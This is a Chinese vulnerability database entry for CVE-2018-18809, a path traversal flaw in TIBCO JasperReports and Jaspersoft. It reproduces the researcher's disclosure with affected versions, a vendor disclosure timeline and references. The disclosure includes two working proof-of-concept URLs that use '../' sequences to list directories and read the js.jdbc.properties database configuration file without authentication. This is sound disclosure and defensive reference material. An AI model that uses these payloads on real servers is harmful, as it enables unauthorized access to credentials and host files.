多款TIBCO Software产品安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1524101 漏洞类型 路径遍历
发布时间 2019-03-06 更新时间 2019-03-06
CVE编号 CVE-2018-18809 CNNVD-ID CNNVD-201903-233
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://www.securityfocus.com/bid/107351
https://cxsecurity.com/issue/WLB-2019090068
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201903-233
|漏洞详情
多款TIBCO Software产品中的默认服务器配置组件存在路径遍历漏洞。攻击者可利用该漏洞访问主机系统内容。以下产品和版本受到影响:TIBCO JasperReports Library 6.3.4版本,6.4.1版本,6.4.2版本,6.4.21版本,7.1.0版本,7.2.0版本;TIBCO JasperReports Library(社区版)6.7.0及之前版本,7.1.0及之前版本;适用于ActiveMatrix BPM的TIBCO JasperReports Library 6.4.3及之前版本;TIBCO Jaspersoft for AWS with Multi-Tenancy 7.1.0及之前版本;适用于AWS的TIBCO Jaspersoft Reporting and Analytics 7.1.0及之前版本。
|漏洞EXP
Title: CVE-2018-18809 Path traversal in Tibco JasperSoft
Credit: Elar Lang / https://security.elarlang.eu
Vendor/Product: Tibco JasperSoft (https://www.jaspersoft.com/)
Vulnerability: Path traversal
CVE: CVE-2018-18809

# Path traversal
Vulnerability is in reportresource/reportresource/ service and in resource
parameter. There is "defence" - value for resource param must start with
net/sf/jasperreports/.

Available for remote not authenticated users.

## Proof-of-Concept
Reading file listing:
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../

Reading file content (js.jdbc.properties as an example):
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties

# List of Systems Affected, Related fixes and releases:
"TIBCO Security Advisory: March 6, 2019 - TIBCO JasperReports Library -
2018-18809"
https://www.tibco.com/support/advisories/2019/03/tibco-security-advisory-march-6-2019-tibco-jasperreports-library-2018-18809


# Vulnerability Disclosure Timeline

2018-10-15 | me > Tibco | Notification to security@tibco.com
2018-10-15 | Tibco > me | Thanks for PoC

2018-10-29 | me > Tibco | How is going? No fixes even for their own site.
2018-10-15 | Tibco > me | Explanation of policy that they threat everyone
equally and as no fix available for their customer, they can not fix their
own site also.

2019-01-11 | Tibco > me | Issue is still under investigation. Issue
discovery credits and publishing details coordination for future.
2019-01-11 | me > Tibco | Response, agreement with credits.

2019-03-06 | Tibco > me | "We published security advisories"
2019-03-06 | Tibco | "TIBCO Security Advisory: March 6, 2019 - TIBCO
JasperReports Library - 2018-18809"

2019-04-21 | me > Tibco | I'm going to write Full Disclosure, but your own
demo site is still vulnerable.
..
2019-04-26 | Tibco > me | Demo site fixed/updated now.

2019-09-07 | me | Full Disclosure on https://security.elarlang.eu

# More detailed description is available in blog:
https://security.elarlang.eu/cve-2018-18809-path-traversal-in-tibco-jaspersoft.html

--
Elar Lang
Blog @ https://security.elarlang.eu
Pentester, lecturer @ http://www.clarifiedsecurity.com


|受影响的产品
TIBCO Jaspersoft Reporting and Analytics for AWS 7.1.1 TIBCO Jaspersoft for AWS with Multi-Tenancy 7.1.1 TIBCO JasperReports Server for ActiveMatrix BPM 6.4.4 TIBCO JasperReports Server Community Edition 7.1.1 TIBCO JasperReports Server Community Edition
|参考资料

来源:www.tibco.com

链接:https://www.tibco.com/support/advisories/2019/03/tibco-security-advisory-march-6-2019-tibco-jasperreports-library-2018-18809


来源:www.tibco.com

链接:http://www.tibco.com/services/support/advisories


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2018-18809